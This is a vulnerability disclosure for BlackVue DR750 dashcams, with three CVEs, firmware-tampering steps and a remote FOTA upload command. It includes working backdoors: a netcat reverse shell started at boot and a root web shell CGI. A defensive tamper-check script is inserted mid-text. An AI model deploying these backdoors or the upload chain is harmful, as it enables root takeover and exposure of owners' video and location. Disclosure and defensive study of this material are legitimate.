# BlackVue DR750 CVEs (+ more)

The below is for educational purposes only, do not try this on any device you do not own or have permission to use.

As of writing, there are about 300 vulnerable BlackVue devices online, which can easily be discovered and exploited, and no official patch is out.

BlackVue was informed about these vulnerabilities on 30-07-2022 and responded that they would look into the issues. However, nothing has happened as far as we are aware.

## Backdooring the device (CVE-2023-27748)

### No Firmware Authentication Check

There is no authenticity check for the firmware, which allows an attacker to upload custom firmware. This custom firmware can include backdoors or exploits.

Steps to reproduce:

  1. Download a firmware archive from BlackVue's website
  2. Unpack the .zip containing the firmware files
  3. Unpack the image patch_<dashcam_name>.bin
  4. Change/add the files wanted (check Example Backdoors)
  5. tar.gz the image again
  6. Calculate the sue checksum for the new patch_<dashcam_name>.bin (check sue_checksum)

```sh
# downloaded from https://blackvue.com/download/dr750-2ch-lte-firmware-multilanguage/
$ unzip dr750-2ch-lte-v1.012-eng.zip
$ cd BlackVue/System/upgrade
$ mkdir patch-out
$ tar -C patch-out -xvzf patch_DR750LTE.bin
# make changes in patch-out
$ tar -C patch-out -czvf patch_DR750LTE.bin .
$ python3 sue_checksum.py patch_DR750LTE.bin patch_DR750LTE.bin.sue
$ cd ../../../
```

Then just place the folder BlackVue on the SD card of the dashcam, and it will start running it.

When creating firmware for FOTA (Firmware Over The Air), create a .tgz file of the System directory instead (the archive contents must be given as an operand, otherwise tar refuses to create an empty archive):

```sh
$ tar -C BlackVue/System -czvf fwupgrade.tgz .
```

This file can then be used later to upload a custom firmware using FOTA and compromise a dashcam fully.

It is important to note that during testing, even when the official firmware from BlackVue's website was flashed back to the device, the backdoors that had been placed persisted.
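Because a planted file survives a reflash, a defender wants a way to tell a pristine patch image from a modified one. The following Python is an added example, not code from this repository: it hashes every file inside a patch_<dashcam_name>.bin image (a tar.gz, as described above) and diffs the result against a manifest taken from a known-good vendor image. The sample image contents are constructed for the demo; the two planted paths are the ones used in the Example backdoors section below.

```python
# Added example, not from the original write-up: diff the contents of a
# patch_<dashcam_name>.bin image (a tar.gz, as described above) against a
# manifest taken from a known-good vendor image, so planted or altered files
# stand out. The sample images below are constructed for the demo.
import hashlib
import io
import tarfile

def build_image(files: dict) -> bytes:
    """Build an in-memory tar.gz from {path: bytes} (constructed test data only)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, content in files.items():
            info = tarfile.TarInfo(name=path)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()

def manifest(image: bytes) -> dict:
    """Map every regular file in the image to its SHA-256 hex digest."""
    digests = {}
    with tarfile.open(fileobj=io.BytesIO(image), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile():
                digests[member.name] = hashlib.sha256(tar.extractfile(member).read()).hexdigest()
    return digests

def diff_manifests(baseline: dict, candidate: dict) -> dict:
    """Files added, removed or changed relative to the known-good baseline."""
    common = baseline.keys() & candidate.keys()
    return {
        "added": sorted(candidate.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - candidate.keys()),
        "changed": sorted(p for p in common if baseline[p] != candidate[p]),
    }

VENDOR = {"./etc/init.d/S50network": b"#!/bin/sh\n# vendor service\n",
          "./res/System/www/index.html": b"<html></html>\n"}
PRISTINE = build_image(VENDOR)
# Same image with the two persistence paths named in this write-up planted on top.
TAMPERED = build_image({**VENDOR,
                        "./etc/init.d/S85backdoor": b"#!/bin/sh\n# planted\n",
                        "./res/System/www/cmd.cgi": b"#!/bin/sh\n# planted\n"})

def check_image(image: bytes, baseline: bytes = PRISTINE) -> dict:
    """Compare a candidate image against the baseline image's manifest."""
    return diff_manifests(manifest(baseline), manifest(image))

if __name__ == "__main__":
    print(check_image(TAMPERED))
```

On a real device the baseline manifest would be recorded once from an unmodified vendor download and stored off the dashcam, since anything on the SD card or in the image can be rewritten by the same attacker.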

## Unauthenticated FOTA (Firmware Over The Air) protocol

The BlackVue dashcams listen on port 9771/TCP, where the FOTA (firmware over the air) service is running. This service allows a client to ping the device, restart it, get the device time, upgrade the firmware, etc.

There is nothing protecting this endpoint: it can be accessed when connected to the same LAN as the dashcam, or from the internet if the dashcam is connected via LTE, which is a significant security risk. A Python script which can communicate with the FOTA service is included in this repository (software/fota/fota.py).

Create a new firmware based on the steps from the previous section, and upload it using the Python script.

```sh
python software/fota/fota.py 10.0.0.1 upgrade /tmp/fwupgrade.tgz
```

This utility comes with no guarantee that it works, but it has worked once before.

## No firewall

The dashcams do not come with any firewall enabled, which is less of an issue if the dashcam is only connected via Wi-Fi. However, the LTE version is connected directly to the internet, as some mobile providers do not have a firewall set up and do not put their users behind NAT. The absence of a firewall can be verified by looking at the extracted firmware.

At the very least the BlackVue dashcams with LTE should block connections on the LTE side.

## Insecure default Wi-Fi password (CVE-2023-27746)

The default Wi-Fi password for the dashcam consists only of lowercase alphanumeric characters, with a length of 8. It is possible to intercept a handshake from the dashcam and use tools from Aircrack-ng to recover the password (if the user has not changed it). This can be done in approximately 4 days using rented hardware (~40 EUR).

## Unauthenticated webserver (CVE-2023-27747)

By default the webserver can be accessed without authentication and exposes various endpoints.

```
├── blackvue_live.cgi
├── blackvue_livedata.cgi
├── blackvue_vod.cgi
├── Config
├── index.html
├── Record
└── upload.cgi
```

These endpoints allow the following:

  1. Live feed of the dashcam
  2. Live data feed (position, speed, etc.)
  3. Download all recordings from the dashcam
  4. Upload a custom config to the dashcam
  5. Download the current config from the dashcam
     1. This includes potential Wi-Fi information that can be decrypted (see Insecure storage of Wi-Fi password on SD-card below)

## Insecure storage of Wi-Fi password on SD-card

The Wi-Fi SSID and password of the network the dashcam will connect to are stored on the SD-card in the dashcam. This data is encrypted, but the key is easily revealed by reverse engineering the app, as demonstrated by wifi-decrypt.py.

It is also worth noting that when changing the Wi-Fi network the dashcam should connect to, these values are sent to BlackVue's servers, which store them until they can send the information to the dashcam. Whether this data is deleted once the dashcam becomes available is unknown.

## Combining these attacks

All these can be combined into simple RCE, especially with the LTE dashcams.

  1. Craft a custom firmware with a backdoor
  2. Use fota.py to upload the firmware remotely
  3. Connect to backdoor
  4. ???
  5. Profit

## Example backdoors

Some examples of backdoors which could be included in custom firmware.

### Netcat

The following backdoor will connect to a remote machine and give full shell access as root.

/bin/backdoor.sh

```sh
#!/bin/sh
IP=$1
PORT=$2

while /bin/true; do
    /usr/bin/nc $IP $PORT -e /bin/sh
done
```

The following init.d script will start the backdoor at every boot, and connect to the given IP/port.

/etc/init.d/S85backdoor

```sh
#!/bin/sh
/bin/backdoor 10.99.77.20 1745 &
```

### cmd.cgi

The following backdoor will allow executing commands (as root) when a payload is sent to the webserver.

/res/System/www/cmd.cgi

```sh
#!/bin/sh

echo "Content-type: text/html"    # set the data-type we want to use
echo ""

POST_STRING=$(/bin/cat)
echo $POST_STRING
exec $POST_STRING
```